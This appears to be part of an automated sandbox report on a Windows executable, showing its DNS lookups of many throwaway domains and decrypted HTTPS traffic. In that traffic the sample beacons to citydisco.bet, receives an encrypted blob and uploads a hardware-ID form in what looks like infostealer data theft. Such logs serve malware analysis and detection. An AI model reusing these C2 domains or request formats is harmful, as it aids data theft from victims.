                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.575683117 CET192.168.2.81.1.1.10xdc62Standard query (0)legenassedk.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.768379927 CET192.168.2.81.1.1.10x9cc2Standard query (0)htardwarehu.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.785901070 CET192.168.2.81.1.1.10xc080Standard query (0)cjlaspcorne.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.806643009 CET192.168.2.81.1.1.10xf53fStandard query (0)bugildbett.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.833431959 CET192.168.2.81.1.1.10xe7d3Standard query (0)latchclan.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.847145081 CET192.168.2.81.1.1.10xb5eaStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.522490978 CET192.168.2.81.1.1.10x2844Standard query (0)guntac.betA (IP address)IN (0x0001)false

                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Mar 13, 2025 14:58:06.759413004 CET1.1.1.1192.168.2.80x7f7bNo error (0)citydisco.bet188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:06.759413004 CET1.1.1.1192.168.2.80x7f7bNo error (0)citydisco.bet188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.751461029 CET1.1.1.1192.168.2.80xf2f8Name error (3)featureccus.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET1.1.1.1192.168.2.80x9072No error (0)mrodularmall.top104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET1.1.1.1192.168.2.80x9072No error (0)mrodularmall.top104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET1.1.1.1192.168.2.80x9072No error (0)mrodularmall.top104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET1.1.1.1192.168.2.80x9072No error (0)mrodularmall.top104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET1.1.1.1192.168.2.80x9072No error (0)mrodularmall.top104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET1.1.1.1192.168.2.80x9072No error (0)mrodularmall.top104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET1.1.1.1192.168.2.80x9072No error (0)mrodularmall.top104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.570880890 CET1.1.1.1192.168.2.80x25d9No error (0)jowinjoinery.icu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.570880890 CET1.1.1.1192.168.2.80x25d9No error (0)jowinjoinery.icu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.763010025 CET1.1.1.1192.168.2.80xdc62No error (0)legenassedk.top188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.763010025 CET1.1.1.1192.168.2.80xdc62No error (0)legenassedk.top188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET1.1.1.1192.168.2.80x9cc2No error (0)htardwarehu.icu104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET1.1.1.1192.168.2.80x9cc2No error (0)htardwarehu.icu104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET1.1.1.1192.168.2.80x9cc2No error (0)htardwarehu.icu104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET1.1.1.1192.168.2.80x9cc2No error (0)htardwarehu.icu104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET1.1.1.1192.168.2.80x9cc2No error (0)htardwarehu.icu104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET1.1.1.1192.168.2.80x9cc2No error (0)htardwarehu.icu104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET1.1.1.1192.168.2.80x9cc2No error (0)htardwarehu.icu104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET1.1.1.1192.168.2.80xc080No error (0)cjlaspcorne.icu104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET1.1.1.1192.168.2.80xc080No error (0)cjlaspcorne.icu104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET1.1.1.1192.168.2.80xc080No error (0)cjlaspcorne.icu104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET1.1.1.1192.168.2.80xc080No error (0)cjlaspcorne.icu104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET1.1.1.1192.168.2.80xc080No error (0)cjlaspcorne.icu104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET1.1.1.1192.168.2.80xc080No error (0)cjlaspcorne.icu104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET1.1.1.1192.168.2.80xc080No error (0)cjlaspcorne.icu104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET1.1.1.1192.168.2.80xf53fNo error (0)bugildbett.top104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET1.1.1.1192.168.2.80xf53fNo error (0)bugildbett.top104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET1.1.1.1192.168.2.80xf53fNo error (0)bugildbett.top104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET1.1.1.1192.168.2.80xf53fNo error (0)bugildbett.top104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET1.1.1.1192.168.2.80xf53fNo error (0)bugildbett.top104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET1.1.1.1192.168.2.80xf53fNo error (0)bugildbett.top104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET1.1.1.1192.168.2.80xf53fNo error (0)bugildbett.top104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.845788956 CET1.1.1.1192.168.2.80xe7d3Name error (3)latchclan.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.854360104 CET1.1.1.1192.168.2.80xb5eaNo error (0)steamcommunity.com104.73.234.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.569567919 CET1.1.1.1192.168.2.80x2844No error (0)guntac.bet188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.569567919 CET1.1.1.1192.168.2.80x2844No error (0)guntac.bet188.114.97.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                          • citydisco.bet
                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                          • guntac.bet

                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.849682188.114.97.34437128C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-03-13 13:58:08 UTC263OUTPOST /gdJIS HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 73
                                                                                                                                                                                                                          Host: citydisco.bet
                                                                                                                                                                                                                          2025-03-13 13:58:08 UTC73OUTData Raw: 75 69 64 3d 37 33 37 30 39 63 65 36 61 33 39 36 64 61 33 33 37 39 36 37 64 34 35 35 61 35 64 35 37 39 34 37 26 63 69 64 3d 61 36 65 33 34 38 33 35 32 39 33 64 61 31 37 38 32 38 30 33 34 63 39 36 32 34 66 34 62 36 34 39
                                                                                                                                                                                                                          Data Ascii: uid=73709ce6a396da337967d455a5d57947&cid=a6e34835293da17828034c9624f4b649
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:09 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 14408
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2L%2FTF6OmirOBn5je3Kr3zYA4kr98L7TF0RA0oUiewnWElXWxou4kzZi6xEa%2BN6sPx3OoW8%2F2E4zOQVAltQviGI8cEgWCEc4hrLZd%2BDFtgl7kUri90SC5Lra%2Bp6dUVYDw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 91fc0b602fc25961-IAD
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=18435&min_rtt=14594&rtt_var=7551&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=972&delivery_rate=198328&cwnd=243&unsent_bytes=0&cid=740add63977cfd66&ts=1202&x=0"
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC586INData Raw: 73 a4 76 9c c2 a6 cc d4 3f 07 b4 11 5d fd 00 4d 89 ab 11 30 b7 c3 c2 a5 26 00 08 a8 35 55 db de 3d 6b c4 b7 fe 58 11 9d fb 6e 35 52 62 50 08 0b 0a 0f a1 63 bd 02 5b b2 3b bc 73 a2 97 e1 d8 08 95 0a a4 20 64 11 6c 43 aa e0 33 6d 5c e1 94 da 6d 5d 4c fb e8 fe b1 61 90 ce 57 d2 0c fd ce 37 dc ea ec 21 5e dc fd 36 bd 31 fd 87 ae 9e 5b db dd dd 17 22 14 2b e1 66 ba 17 8c bc 41 c1 6e dc 86 a8 d8 25 81 db e3 c9 8a e4 b7 3d e9 1f 3b c6 98 21 d1 3f fb 0f 74 69 86 3c 97 0c 72 98 b7 ea 8c 87 94 8c 4c 76 9c 2b d5 5c 53 bf db 5f ce f8 05 eb f9 c1 5c 8a 19 29 f6 a2 ee fe 23 ae 78 0d c1 6d 20 ce 90 4e 44 b9 40 85 d7 90 81 d0 1d 73 15 35 59 33 91 b5 81 9b 75 b1 ac c3 31 75 c7 ba 7f d4 0b f5 c3 c1 bc 95 e4 53 2c 12 0f 3e 6c de 7e 95 7d fd d1 48 b4 a0 53 13 d3 69 7b c4 b7
                                                                                                                                                                                                                          Data Ascii: sv?]M0&5U=kXn5RbPc[;s dlC3m\m]LaW7!^61["+fAn%=;!?ti<rLv+\S_\)#xm ND@s5Y3u1uS,>l~}HSi{
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: 88 c7 e8 ba c8 0f 5d e5 7d b6 9d 3c ef ba da 1c 8f 75 ae 99 a4 84 79 e4 cc c0 2b 8e 0c 86 09 51 f1 91 84 4b cb b8 69 e6 fe b1 41 e2 56 a5 fe 6e a5 f0 9f e4 a8 85 c9 37 15 59 f8 01 6b 8c fe f3 df 7f 7e 35 95 00 54 c2 88 57 fb 02 ce 7c d8 08 83 18 f7 8a 0e d1 31 b9 92 b5 80 c1 4e 78 4f b4 ff 0c 59 19 6d 0f d8 95 01 ae 13 a8 cd 39 94 bb 97 b3 e1 71 7e a1 93 30 42 c6 9f 58 f9 b6 2a 74 e2 da 6c 30 32 5a 6f 77 2a 41 a8 eb 75 b6 58 d5 ac 66 1c c2 ae c3 af 05 43 18 aa 9c 6a c1 f3 11 59 da 60 45 ab d5 aa 2a 27 19 3a 3b 11 35 ad a7 20 7c b0 d7 29 5d 03 be 02 78 17 e8 4f b8 45 d8 af b2 71 be e9 cb ab 9a 0d 2f ce 1b 31 0b 54 f5 b6 32 3b 38 d6 38 7e 28 d6 6b 47 f6 96 2c fe 3f d9 38 cf c1 e1 c0 0a 69 d9 f8 1d ac cf e4 9a 24 dd 24 5f 87 de e3 46 c6 b9 52 b3 93 d5 42 8e
                                                                                                                                                                                                                          Data Ascii: ]}<uy+QKiAVn7Yk~5TW|1NxOYm9q~0BX*tl02Zow*AuXfCjY`E*':;5 |)]xOEq/1T2;88~(kG,?8i$$_FRB
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: d2 6e 4f ad 3d 55 f8 cd 14 ee 93 a6 ae 2f 61 f5 f9 9b 41 38 5f de 39 f0 a7 23 42 83 c3 0f e2 dc 58 11 b5 b1 91 84 0f 78 b1 df 9a d2 16 e4 32 b3 c5 ba 72 e1 e2 26 18 bf 33 2d 5b 35 3a 56 8e 7a f1 fa bc 23 1a 71 21 06 bd 3e a0 31 c9 97 18 c8 db 78 d9 8d 8d 40 9b 95 4a 35 f4 34 83 4f 2e be 4c c8 61 ed 93 f1 7e c4 50 ff b0 01 6f ad 60 03 96 dc 95 bc 59 0e c2 2f 86 7f e8 e0 11 73 08 3c 7b bb 29 0a e4 ca 7e 2f 59 ec a8 b7 2a 76 e3 8d e6 a4 39 01 b4 fb 86 ab 2e 76 49 37 4e c4 dc f7 17 29 6d fb d0 09 e7 e7 7e 70 94 1f 1e b6 f4 60 04 99 11 54 67 50 98 c2 7d 55 d2 73 9d 04 02 db 40 bb 3c 3c e9 95 88 08 b3 bf 3b 14 35 87 42 f1 b3 f0 a8 c6 a1 6c a0 cf c7 0c 03 89 01 d5 f6 4f 72 75 47 5e cf 37 6b 08 8b 93 a8 cc 71 d7 2a 23 51 5f d2 50 53 e2 6a 20 e2 51 17 ef 81 56 09
                                                                                                                                                                                                                          Data Ascii: nO=U/aA8_9#BXx2r&3-[5:Vz#q!>1x@J54O.La~Po`Y/s<{)~/Y*v9.vI7N)m~p`TgP}Us@<<;5BlOruG^7kq*#Q_PSj QV
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: db 34 89 c0 66 e2 a9 6c 8b 4c 7e cd 6a e9 66 9f 46 28 90 9c 07 33 89 46 a6 bf 1d fb 2b 23 f1 41 4d 72 fe c8 8f 13 36 de 5e 8b dd c2 13 9c e3 28 1e 88 a0 06 94 e9 ce b1 b5 51 7c 78 77 c3 ee 72 bb 7f f3 96 8c 71 2e 51 de cb 10 fd d2 ce 24 fa 20 a1 45 fd d1 5e 00 1f f9 70 d2 85 4d ff 2d fd 02 44 e3 f5 35 da c3 67 0a 9d 1f dc f3 4b 18 4a 82 03 eb 47 c1 57 e3 da 77 89 4e 4a c0 0a ca c7 d2 8f 7c 96 46 1c 7c 7c 84 d9 38 17 ee 86 6f 83 91 af 6d 61 45 86 29 6c 3f dd 29 8e c6 97 18 99 c0 c5 06 68 2f 30 b4 27 bc b7 72 8e c1 70 c4 f4 7f f0 36 34 aa b0 9b 70 f7 7d d3 6a 74 f3 11 43 a6 45 8d 2b a0 84 6d 4d 6b 3c 4f 17 3f 66 13 28 4d 11 63 d5 a6 b9 38 92 63 54 f3 1c 5d 70 3e 03 96 64 c7 4b 7c 6b 01 30 d6 3a dd 92 2e cf 1f c3 d7 3d 7d 50 c6 26 bc 0d 36 37 12 c0 e0 13 e5
                                                                                                                                                                                                                          Data Ascii: 4flL~jfF(3F+#AMr6^(Q|xwrq.Q$ E^pM-D5gKJGWwNJ|F||8omaE)l?)h/0'rp64p}jtCE+mMk<O?f(Mc8cT]p>dK|k0:.=}P&67
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: a9 f4 3e 02 50 03 c2 55 cc f9 55 6a 40 84 68 d3 70 35 b3 15 40 a1 17 8c fc 1b b1 ef 69 3c 1a 64 a3 dd b7 bd 16 43 6d 4e a4 dd c9 f2 3d 22 e9 31 04 72 fa e9 7e 4f c5 f7 c9 f4 99 5c 18 9d 84 f4 65 f5 f8 b5 c0 8c 35 bd 50 e5 52 bd 33 b0 5a 31 92 24 8d 8c be 2b 7c e5 91 98 8f 7e c4 60 31 b4 b1 97 88 d7 cb 56 a9 2c 29 27 94 ea ef 5a 5c bf 7a 1c 64 dc ef dd a0 69 d1 b7 8c 1c d6 9d 8a 44 c4 15 eb 0f 06 d1 e6 0f 3e c6 03 77 7e 50 66 00 7e 94 b4 e2 9c 20 7d 6b 2d 2a b5 d0 05 78 8f e0 c2 69 e3 ae 2c 10 02 0c bf 5d 7e 60 b2 56 e4 5a 4c 4e 78 c6 76 18 92 c3 0d 3c d5 6f 90 ec d1 7f cd 71 b0 d4 ed 15 69 30 1a fe d1 35 df 01 82 0f 42 95 72 65 dd 3b cf 3c 9f b3 44 2e bd 3e 35 92 2c 4a 2d db b0 f9 8b 01 38 eb e7 64 0f 4f f1 e4 29 52 b2 95 c7 7f 2c 98 3b 31 f7 e1 3b 2c 09
                                                                                                                                                                                                                          Data Ascii: >PUUj@hp5@i<dCmN="1r~O\e5PR3Z1$+|~`1V,)'Z\zdiD>w~Pf~ }k-*xi,]~`VZLNxv<oqi05Bre;<D.>5,J-8dO)R,;1;,
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: 42 25 88 9b 54 4a d6 05 58 8f e6 3e 49 04 de 2c 56 a9 b1 4b ec 3b b7 04 39 07 64 ac 2a 87 78 d9 83 50 e0 6f 20 04 da 15 7d fb b5 f3 50 bb d2 b2 ef 71 0a 3d 47 ad 27 4c 07 c0 f1 a4 01 86 bf 04 bf ab 03 9b ea 7f eb 68 64 1f d8 18 33 25 80 45 5d 85 c0 fe 44 5d f5 3a 9c dd 31 f1 34 79 95 66 c0 50 22 56 39 28 5a 32 39 83 16 e5 b8 c6 65 46 09 67 97 6b ca be c9 20 80 7e df bd e1 e7 c2 51 5a 39 e1 a3 5d ba fb 59 4b 06 40 34 5b cf 15 9e f5 17 20 0b 6e 35 09 1f 21 34 10 69 16 37 d9 d1 e8 0f 62 5b 5a ef 5a 28 65 3c 59 06 09 d8 28 ba 43 89 c8 b3 8c 6a 56 9a f0 13 ea 1c 2f a6 f5 97 68 5e 57 41 de 55 ee 14 e6 b1 fa 42 8e 18 b5 40 4b 6d 61 35 18 6c 01 f0 93 ea 58 dc 60 d1 5a f3 ac d8 80 bc 1a 0f ea d2 d3 3c e4 41 e9 db b0 f9 ff fa ac 74 52 7b 7c 55 9c 2b 0f c3 66 5b 40
                                                                                                                                                                                                                          Data Ascii: B%TJX>I,VK;9d*xPo }Pq=G'Lhd3%E]D]:14yfP"V9(Z29eFgk ~QZ9]YK@4[ n5!4i7b[ZZ(e<Y(CjV/h^WAUB@Kma5lX`Z<AtR{|U+f[@
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: b4 21 11 e6 b3 ca 2f 47 34 d2 6c c8 c0 a3 23 6c e0 3b 88 70 5c 72 ae 34 5d 69 3e dd 06 fe 3f 50 64 5e ad d3 0b 15 4b 49 6a f9 a0 a2 e2 91 01 0c 7c 6c 7d ad eb 53 3e a9 32 14 ca 92 aa d3 4e 96 89 d1 32 7a 7a ea ba 26 cb ac 65 10 dc a7 4f b8 f4 b5 27 cf 9e ff 7c ce 98 0f c7 67 88 eb 13 40 ec 5d a4 90 1b 9f b3 3d 03 31 a8 43 6b 4f 13 56 6f 1c 4a d9 2d 8a 11 a8 21 94 82 b9 3a fc 49 49 5f 8b 60 bb ab c8 ec 8f 68 7f b1 d8 27 f8 37 f6 c6 ad 24 82 b6 80 96 aa 3b 92 2f 95 8f 33 f9 de 7e 6b 06 bc 9d f5 39 10 c2 4e b9 ef 61 5d ed 6f 86 1d 1b 5d 80 e7 61 ba 39 9a c7 bc 62 b0 b9 b7 60 ea a2 25 db 5d 16 e0 9e 13 96 0d d1 c7 81 c3 7f 9d 3d 39 ee f7 e4 a5 aa 65 fa e6 55 1b 09 ce e4 24 4d 77 a0 a7 a5 45 6c 63 d0 78 74 e9 8d 0a 36 6d 07 48 5a b6 3d 4e 9b c4 7e ef ba 92 75
                                                                                                                                                                                                                          Data Ascii: !/G4l#l;p\r4]i>?Pd^KIj|l}S>2N2zz&eO'|g@]=1CkOVoJ-!:II_`h'7$;/3~k9Na]o]a9b`%]=9eU$MwElcxt6mHZ=N~u
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: 68 f0 d8 8a 4f 35 8d 8b 62 95 e8 d3 51 03 f2 cb ab d1 f2 b1 cf 9a 25 be 2b 6f a7 b8 6c 4f a9 8b 8e 33 d9 db 8f 74 b0 54 32 56 74 d8 5a 72 ba 02 99 51 10 21 bf 34 3b 14 26 96 3d b0 7c 62 0e 9a 7d 83 0f 6b bb 97 80 7a e0 ca bc 23 b6 c1 cc 93 37 14 93 40 9b 2c 61 89 6f 46 48 89 c3 31 59 0f 63 e0 d3 37 36 f8 91 27 3a 9e d1 f5 a9 93 b6 b7 2f 32 cc 9d 95 07 f0 26 f0 a9 ff a1 d6 6e 94 4f a0 0e e1 68 ab a1 57 66 55 65 65 4a b1 e8 e6 9f 60 dc af 5f b9 c3 dd 4b 52 a5 20 62 36 92 dc 93 da 03 7d ac 0b d6 f1 eb cb 53 ec e1 46 cc 34 52 35 5a bf 3d 43 87 cc 76 e2 93 f4 15 e4 df 70 20 b6 4f 49 d5 6d dc 9a 49 e0 55 3e 6b 7e 0c de 4d db 50 0c ec aa 57 2b 04 65 0c 2c 61 48 39 02 bc 7e 93 16 db 67 19 d5 05 60 fe 5c 6a 19 10 93 34 23 2f e0 61 3c 29 66 a5 24 75 47 52 d5 78 72
                                                                                                                                                                                                                          Data Ascii: hO5bQ%+olO3tT2VtZrQ!4;&=|b}kz#7@,aoFH1Yc76':/2&nOhWfUeeJ`_KR b6}SF4R5Z=Cvp OImIU>k~MPW+e,aH9~g`\j4#/a<)f$uGRxr
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: 75 ad 91 7f 29 32 46 ca b3 2e 81 a2 b2 10 7a 2c d2 ae bf bc 2c 80 62 e2 50 1e 2d a4 de 3e 3d c0 bc b3 c1 2f 06 3f 8f 65 91 b2 4c 37 3c 15 3a 8a a8 3a f0 d0 0e 96 2f e2 a2 34 a9 7c 5d 5c 9e 78 06 a1 19 05 7d a6 32 21 b3 bf b2 48 76 93 c2 7b b2 66 36 08 72 34 31 4e 0c eb b8 69 f0 25 67 c2 7a 76 90 0c 48 26 64 02 ab 05 77 e1 d0 06 21 13 ad ae 49 74 d8 54 d1 58 9c d9 74 a0 d7 8e 8e 9b c5 e2 86 6d 9b 17 51 39 d6 95 c8 2b db b6 7f c5 5d 3f 1c 7f e3 2f 37 0b 05 c1 0d c7 56 c3 4a ee f8 8d 64 41 3b 0c 38 e1 bf 50 bc 64 cb b7 0d a5 78 25 f5 b2 ad 44 1e ce 46 f1 3f 77 4c 47 7b 3c 39 18 fa d4 4e 8c 39 bf 6a 3a 53 fe df ed f0 e9 d5 92 2b d2 84 f9 bc 0f 67 39 91 a4 7b 3b 57 ee 70 c1 68 ac ef e5 17 19 f3 9e 37 8c fb 6e e5 52 cb b0 36 0d 3c bb 01 c8 ff 3d 05 ab 54 93 98
                                                                                                                                                                                                                          Data Ascii: u)2F.z,,bP->=/?eL7<::/4|]\x}2!Hv{f6r41Ni%gzvH&dw!ItTXtmQ9+]?/7VJdA;8Pdx%DF?wLG{<9N9j:S+g9{;Wph7nR6<=T


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.849683188.114.97.34437128C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-03-13 13:58:11 UTC278OUTPOST /gdJIS HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=g82Kw7030JG54Ml
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 14496
                                                                                                                                                                                                                          Host: citydisco.bet
                                                                                                                                                                                                                          2025-03-13 13:58:11 UTC14496OUTData Raw: 2d 2d 67 38 32 4b 77 37 30 33 30 4a 47 35 34 4d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 33 37 30 39 63 65 36 61 33 39 36 64 61 33 33 37 39 36 37 64 34 35 35 61 35 64 35 37 39 34 37 0d 0a 2d 2d 67 38 32 4b 77 37 30 33 30 4a 47 35 34 4d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 67 38 32 4b 77 37 30 33 30 4a 47 35 34 4d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 38 36 35 41 31 44 38 38 42 42 43 42 38 44 32 36 38 45 30 39
                                                                                                                                                                                                                          Data Ascii: --g82Kw7030JG54MlContent-Disposition: form-data; name="uid"73709ce6a396da337967d455a5d57947--g82Kw7030JG54MlContent-Disposition: form-data; name="pid"2--g82Kw7030JG54MlContent-Disposition: form-data; name="hwid"BF865A1D88BBCB8D268E09
                                                                                                                                                                                                                          2025-03-13 13:58:11 UTC811INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:11 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SU9zG%2B4hdw2ZFTkhPMzzzck0hBOshx3XTDQMWSK8yKFtLEN0FVzC98bk66x5el2e6Ak%2BjxgEHTmkG8OmJGAfvd6rzVkrbj2g9UAolECmjF7PQQMR4Aa2d60ds%2FNCTNna"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 91fc0b701e652000-IAD
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=18497&min_rtt=15142&rtt_var=7268&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=15432&delivery_rate=191142&cwnd=250&unsent_bytes=0&cid=0903f5e6a871bb68&ts=1025&x=0"
                                                                                                                                                                                                                          2025-03-13 13:58:11 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 34 2e 31 31 30 2e 32 32 33 2e 31 34 38 22 7d 7d 0d 0a
                                                                                                                                                                                                                          Data Ascii: 46{"success":{"message":"message success delivery from 74.110.223.148"}}
                                                                                                                                                                                                                          2025-03-13 13:58:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


